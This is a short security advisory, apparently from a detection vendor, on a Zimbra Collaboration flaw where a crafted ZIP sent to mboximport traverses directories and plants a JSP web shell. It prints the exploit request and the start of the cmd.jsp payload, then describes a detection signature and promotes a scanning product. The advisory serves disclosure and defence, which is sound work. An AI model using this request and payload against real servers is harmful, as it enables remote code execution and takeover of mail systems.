Application Details
Zimbra Collaboration is a cloud based, open-source email platform with integrated and anti-virus.
Vulnerability
Zimbra Collaboration could allow a remote authenticated attacker to traverse directories on the system, caused by improper ZIP archive validation by the mboximport function.
Identification
An attacker could use a specially crafted URL request containing "dot dot" sequences (/../) to execute arbitrary code on the system.
POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd
PAYLOAD - PK..........
U..*.=...=...0...../../../../mailboxd/webapps/zimbraAdmin/cmd.jsp<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to perform remote code execution on an affected system.
Coverage
Idappcom have created signature 8022991 for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional